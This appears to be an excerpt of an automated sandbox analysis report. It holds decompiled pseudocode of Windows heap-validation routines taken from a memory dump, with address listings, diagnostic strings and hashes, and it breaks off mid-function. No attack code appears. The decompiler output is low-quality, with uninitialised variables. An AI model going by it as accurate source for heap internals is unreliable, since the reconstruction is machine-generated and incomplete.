                      Uniqueness Score: -1.00%

                      Function 016E4AEF, Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E016E4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E0162B150();
						} else {
							E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E0162B150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E016DFA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E0162B150();
						} else {
							E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E0162B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E0162B150();
								} else {
									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E0162B150();
									} else {
										E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E0162B150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E016DFA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E0162B150();
										} else {
											E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0167D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E0162B150();
								} else {
									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E016EA80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E0164E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E016EA80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E0164E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E0164A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E0164A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E0164BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E016D23E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E01621F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                      0x016e4af7
                      0x016e4afb
                      0x016e4afd
                      0x016e4b01
                      0x016e4b03
                      0x016e4b08
                      0x016e4b0a
                      0x016e4b0f
                      0x016e4eb5
                      0x016e4eb5
                      0x016e4ebb
                      0x016e50d5
                      0x016e50d8
                      0x016e4ff6
                      0x00000000
                      0x016e4ff6
                      0x016e50de
                      0x016e50e4
                      0x016e50e8
                      0x016e5107
                      0x016e510c
                      0x016e50ea
                      0x016e50ff
                      0x016e5104
                      0x016e5112
                      0x016e5115
                      0x016e5118
                      0x016e5119
                      0x016e50cb
                      0x016e50cb
                      0x016e50af
                      0x00000000
                      0x016e50af
                      0x016e4ecb
                      0x016e50b6
                      0x016e50bb
                      0x016e4ed1
                      0x016e4ee6
                      0x016e4eeb
                      0x016e50c1
                      0x016e50c2
                      0x016e50c5
                      0x016e50c6
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x016e4b15
                      0x016e4b15
                      0x016e4b1c
                      0x016e4b1e
                      0x016e4b23
                      0x016e4b27
                      0x016e4b33
                      0x016e4b38
                      0x016e4b3a
                      0x016e4b3c
                      0x016e4b41
                      0x016e4b41
                      0x016e4b3a
                      0x016e4b52
                      0x016e5045
                      0x016e504b
                      0x016e504f
                      0x016e506e
                      0x016e5073
                      0x016e5051
                      0x016e5066
                      0x016e506b
                      0x016e5083
                      0x016e5088
                      0x016e5088
                      0x016e508a
                      0x016e5091
                      0x016e5099
                      0x016e5099
                      0x016e509d
                      0x016e50a7
                      0x016e50ad
                      0x016e50ad
                      0x016e50ad
                      0x00000000
                      0x016e509d
                      0x016e4b58
                      0x016e4b5b
                      0x016e4b5e
                      0x016e4b63
                      0x016e4b66
                      0x016e4b69
                      0x016e4b6f
                      0x016e4be4
                      0x016e4bf0
                      0x016e4bf2
                      0x016e4bf5
                      0x016e4dc3
                      0x016e4dc6
                      0x016e4dc9
                      0x016e4dce
                      0x016e4dce
                      0x016e4dd0
                      0x016e4dd0
                      0x016e4dd5
                      0x016e4def
                      0x016e4dd7
                      0x016e4de7
                      0x016e4de7
                      0x016e4df3
                      0x016e5001
                      0x016e5007
                      0x016e500b
                      0x016e502a
                      0x016e502f
                      0x016e500d
                      0x016e5022
                      0x016e5027
                      0x016e5039
                      0x016e503a
                      0x016e503b
                      0x00000000
                      0x016e4df9
                      0x016e4dfd
                      0x016e4e90
                      0x016e4e94
                      0x016e4e9e
                      0x016e4ea4
                      0x016e4ea4
                      0x016e4ea4
                      0x016e4ea6
                      0x016e4ea6
                      0x00000000
                      0x016e4ea6
                      0x016e4e03
                      0x016e4e08
                      0x016e4f88
                      0x016e4f92
                      0x016e4f99
                      0x016e4f9c
                      0x016e4fe0
                      0x016e4fe4
                      0x016e4fee
                      0x016e4ff4
                      0x016e4ff4
                      0x016e4ff4
                      0x00000000
                      0x016e4fe4
                      0x016e4f9e
                      0x016e4fa4
                      0x016e4fa8
                      0x016e4fc7
                      0x016e4fcc
                      0x016e4faa
                      0x016e4fbf
                      0x016e4fc4
                      0x016e4fd2
                      0x016e4fd5
                      0x016e4fd6
                      0x016e4f34
                      0x016e4f34
                      0x00000000
                      0x016e4f39
                      0x016e4e0e
                      0x016e4e14
                      0x016e4e1b
                      0x016e4e25
                      0x016e4e2b
                      0x016e4e2b
                      0x016e4e33
                      0x016e4e38
                      0x016e4e8a
                      0x016e4e8a
                      0x00000000
                      0x016e4e3a
                      0x016e4e3e
                      0x016e4e43
                      0x016e4e47
                      0x016e4e53
                      0x016e4e58
                      0x016e4e5a
                      0x016e4e5c
                      0x016e4e61
                      0x016e4e61
                      0x016e4e5a
                      0x016e4e6e
                      0x016e4f41
                      0x016e4f47
                      0x016e4f4b
                      0x016e4f6a
                      0x016e4f6f
                      0x016e4f4d
                      0x016e4f62
                      0x016e4f67
                      0x016e4f7f
                      0x016e4f80
                      0x016e4f81
                      0x00000000
                      0x016e4e74
                      0x016e4e78
                      0x016e4e82
                      0x016e4e88
                      0x016e4e88
                      0x00000000
                      0x016e4e78
                      0x016e4e6e
                      0x016e4e38
                      0x016e4df3
                      0x016e4bfe
                      0x016e4c01
                      0x016e4c04
                      0x016e4c07
                      0x016e4c09
                      0x016e4c0c
                      0x016e4c0e
                      0x016e4c0e
                      0x016e4c11
                      0x016e4c11
                      0x016e4c0c
                      0x016e4c14
                      0x016e4c17
                      0x016e4dae
                      0x016e4db2
                      0x016e4db7
                      0x016e4dba
                      0x016e4dbd
                      0x016e4ef1
                      0x016e4ef7
                      0x016e4efb
                      0x016e4f1a
                      0x016e4f1f
                      0x016e4efd
                      0x016e4f12
                      0x016e4f17
                      0x016e4f2b
                      0x016e4f2b
                      0x016e4f2d
                      0x016e4f2e
                      0x016e4f2f
                      0x00000000
                      0x016e4f2f
                      0x00000000
                      0x016e4c1d
                      0x016e4c1d
                      0x016e4c20
                      0x016e4c23
                      0x016e4c26
                      0x016e4c29
                      0x016e4c2c
                      0x016e4c2e
                      0x016e4d91
                      0x016e4d91
                      0x016e4d92
                      0x016e4d97
                      0x016e4d9e
                      0x00000000
                      0x016e4d9e
                      0x016e4c34
                      0x016e4c37
                      0x016e4c39
                      0x016e4c3c
                      0x00000000
                      0x00000000
                      0x016e4c45
                      0x016e4c48
                      0x016e4c4e
                      0x016e4c50
                      0x016e4c78
                      0x016e4c78
                      0x016e4c7b
                      0x016e4c7d
                      0x016e4c80
                      0x016e4c84
                      0x016e4cad
                      0x016e4cad
                      0x016e4cb0
                      0x016e4cb8
                      0x016e4cbb
                      0x016e4cbe
                      0x016e4cc1
                      0x016e4cc7
                      0x016e4cdc
                      0x016e4cc9
                      0x016e4cd2
                      0x016e4cd4
                      0x016e4cd4
                      0x016e4cde
                      0x016e4ce0
                      0x016e4d13
                      0x016e4d13
                      0x016e4d16
                      0x016e4d18
                      0x016e4d29
                      0x016e4d2a
                      0x016e4d2c
                      0x016e4d34
                      0x016e4d1a
                      0x016e4d1a
                      0x016e4d1a
                      0x016e4d1d
                      0x016e4d1f
                      0x016e4d22
                      0x016e4d24
                      0x016e4d24
                      0x016e4d3c
                      0x016e4d3f
                      0x016e4d45
                      0x016e4d47
                      0x016e4d6c
                      0x016e4d6c
                      0x016e4d70
                      0x016e4d7e
                      0x016e4d84
                      0x016e4d84
                      0x00000000
                      0x016e4d49
                      0x016e4d49
                      0x016e4d56
                      0x016e4d56
                      0x016e4d59
                      0x00000000
                      0x00000000
                      0x016e4d4e
                      0x016e4d50
                      0x016e4d52
                      0x016e4d8e
                      0x016e4d5d
                      0x016e4d5f
                      0x016e4d67
                      0x00000000
                      0x016e4d67
                      0x016e4d54
                      0x016e4d54
                      0x016e4d5b
                      0x00000000
                      0x016e4d5b
                      0x016e4ce2
                      0x016e4ce2
                      0x016e4ce5
                      0x016e4ce5
                      0x016e4ce7
                      0x016e4cfb
                      0x016e4ce9
                      0x016e4ce9
                      0x016e4cec
                      0x016e4cef
                      0x016e4cf1
                      0x016e4cf3
                      0x016e4cf3
                      0x016e4cf3
                      0x016e4cf6
                      0x016e4cf6
                      0x016e4d02
                      0x016e4d05
                      0x00000000
                      0x00000000
                      0x016e4d07
                      0x016e4d0f
                      0x016e4d11
                      0x00000000
                      0x00000000
                      0x00000000
                      0x016e4d11
                      0x00000000
                      0x016e4ce5
                      0x016e4ce0
                      0x016e4c8a
                      0x016e4c8f
                      0x016e4c91
                      0x00000000
                      0x00000000
                      0x016e4c9d
                      0x00000000
                      0x016e4c9d
                      0x016e4c52
                      0x016e4c5f
                      0x016e4c5f
                      0x016e4c62
                      0x00000000
                      0x00000000
                      0x016e4c57
                      0x016e4c59
                      0x016e4c5b
                      0x016e4caa
                      0x016e4c66
                      0x016e4c68
                      0x016e4c70
                      0x016e4c75
                      0x00000000
                      0x016e4c75
                      0x016e4c5d
                      0x016e4c5d
                      0x016e4c64
                      0x00000000
                      0x016e4c64
                      0x016e4c17
                      0x016e4b75
                      0x016e4bc4
                      0x016e4bc8
                      0x00000000
                      0x00000000
                      0x016e4bd9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x016e4b77
                      0x016e4b7a
                      0x016e4b8c
                      0x016e4b7c
                      0x016e4b7e
                      0x016e4b83
                      0x016e4b86
                      0x016e4b86
                      0x016e4b90
                      0x016e4b93
                      0x00000000
                      0x00000000
                      0x016e4b95
                      0x016e4bab
                      0x016e4bb0
                      0x00000000
                      0x00000000
                      0x016e4bb2
                      0x016e4bb9
                      0x00000000
                      0x00000000
                      0x016e4bbb
                      0x016e4bbe
                      0x016e4bc1
                      0x016e4bc1
                      0x00000000
                      0x016e4bc1
                      0x016e4b97
                      0x016e4ba4
                      0x00000000
                      0x00000000
                      0x016e4ba6
                      0x00000000
                      0x016e4ba6
                      0x016e4ea9
                      0x016e4ea9
                      0x016e4eb2
                      0x00000000

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                      • API String ID: 0-3591852110
                      • Opcode ID: 31a3f926d8cd6bfc257ba056e5d62b6d2860366530ce0a7ff414bc6225f44d3d
                      • Instruction ID: 537974da34dc4c17f618d91f6ff19ceef10c7751849d4fe722114eb113b74efe
                      • Opcode Fuzzy Hash: 31a3f926d8cd6bfc257ba056e5d62b6d2860366530ce0a7ff414bc6225f44d3d
                      • Instruction Fuzzy Hash: E012BE306026429FDB25DF69C898BB6BBE2EF48614F14865DE486CB741DB35E881CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016E4496, Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                      Download Yara Rule
                      C-Code - Quality: 56%
                      			E016E4496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E016E49A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x1716378 = _t267;
						asm("int3");
						 *0x1716378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E0165174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E0162B150();
							} else {
								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E0162B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E0162B150();
							} else {
								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E0162B150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x1716350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
